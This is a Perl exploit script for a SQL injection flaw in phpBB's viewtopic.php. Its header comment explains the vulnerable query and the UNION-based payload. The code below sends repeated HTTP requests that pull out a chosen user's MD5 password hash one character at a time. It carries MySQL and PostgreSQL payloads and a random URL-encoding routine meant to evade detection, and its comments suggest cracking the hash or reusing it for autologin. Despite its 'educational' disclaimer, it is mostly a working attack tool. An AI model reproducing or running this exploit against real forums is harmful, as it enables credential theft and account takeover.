#!/usr/bin/perl -w
#
#
# phpBB password disclosure vuln.
# -- SpyBoy

#
# There is a sql injection vuln which exists in /viewtopic.php file. The variable is $topic_id
# which gets passed directly to sql server in query. Attacker could pass a special sql string which
# can used to see md5 password hash for any user (&#33 for phpBB. This pass can be later used with
# autologin or cracked using john.
#
# Details:
#
# this is checking done for $topic_id in viewtopic.php:
#
# if ( isset($HTTP_GET_VARS[POST_TOPIC_URL]) )
# {
# $topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]);
# }
# else if ( isset($HTTP_GET_VARS['topic']) )
# {
# $topic_id = intval($HTTP_GET_VARS['topic']);
# }
#
# ok... no else statement at end
# now if GET[view]=newest and GET[sid] is set, this query gets executed:
#
# $sql = "SELECT p.post_id
# FROM " . POSTS_TABLE . " p, " . SESSIONS_TABLE . " s, " . USERS_TABLE . " u
# WHERE s.session_id = '$session_id'
# AND u.user_id = s.session_user_id
# AND p.topic_id = $topic_id
# AND p.post_time >= u.user_lastvisit
# ORDER BY p.post_time ASC
# LIMIT 1";
#
# $topic_id gets passed directy to query. So how can we use this to do something important? Well
# I decided to use union and create a second query will get us something useful. There were couple of
# problems i ran into. first, phpBB only cares about the first row returned. second, the select for first
# query is p.post_id which is int, so int becomes the type returned for any other query in union. third,
# there is rest of junk at end " AND p.post_time >= ..." We tell mysql to ignore that by placing /* at end
# of our injected query. So what query can we make that returns only int?
# this one => select ord(substring(user_password,$index,1)) from phpbb_users where user_id = $uid
# Then all we have to do is query 32 times which $index from 1-32 and we get ord value of all chars of
# md5 hash password.
#
# I have only tested this with mysql 4 and pgsql . Mysql 3.x does not support unions so you would have to tweak
# the query to do anything useful.
#
# This script is for educational purpose only. Please dont use it to do anything else.
#
# To Fix this bug : http://www.phpbb.com/phpBB/viewtopic.php?t=112052

use IO::Socket;

$remote = shift || 'localhost';
$view_topic = shift || '/phpBB2/viewtopic.php';
$uid = shift || 2;
$port = 80;

$dbtype = 'mysql4'; # mysql4 or pgsql


print "Trying to get password hash for uid $uid server $remote dbtype: $dbtype\n";

$p = "";

for(&#036;index=1; &#036;index<=32; &#036;index++)
{
&#036;socket = IO::Socket::INET->new(PeerAddr => &#036;remote,
PeerPort => &#036;port,
Proto => "tcp",
Type => SOCK_STREAM)
or die "Couldnt connect to &#036;remote:&#036;port : &#036;@&#092;n";
&#036;str = "GET &#036;view_topic" . "?sid=1&topic_id=-1" . random_encode(make_dbsql()) .
"&view=newest" . " HTTP/1.0&#092;n&#092;n";

print &#036;socket &#036;str;
print &#036;socket "Cookie: phpBB2mysql_sid=1&#092;n"; # replace this for pgsql or remove it
print &#036;socket "Host: &#036;remote&#092;n&#092;n";

while (&#036;answer = <&#036;socket>)
{
if (&#036;answer =~ /Location:.*&#092;x23(&#092;d+)/) # Matches the Location: viewtopic.php?p=<num>#<num>
{
&#036;p .= chr (&#036;1);
}
}

close(&#036;socket);
}

print "&#092;nMD5 Hash for uid &#036;uid is &#036;p&#092;n";

# random encode str. helps avoid detection
sub random_encode
{
&#036;str = shift;
&#036;ret = "";
for(&#036;i=0; &#036;i<length(&#036;str); &#036;i++)
{
&#036;c = substr(&#036;str,&#036;i,1);
&#036;j = rand length(&#036;str) * 1000;

if (int(&#036;j) % 2 || &#036;c eq &#39; &#39
{
&#036;ret .= "%" . sprintf("%x",ord(&#036;c));
}
else
{
&#036;ret .= &#036;c;
}
}
return &#036;ret;
}

sub make_dbsql
{
if (&#036;dbtype eq &#39;mysql4&#39
{
return " union select ord(substring(user_password," . &#036;index . ",1)) from phpbb_users where user_id=&#036;uid/*" ;
} elsif (&#036;dbtype eq &#39;pgsql&#39
{
return ";
select ascii(substring(user_password from &#036;index for 1)) as
post_id from phpbb_posts p, phpbb_users u where u.user_id=&#036;uid or false";
}
else
{
return "";
}
}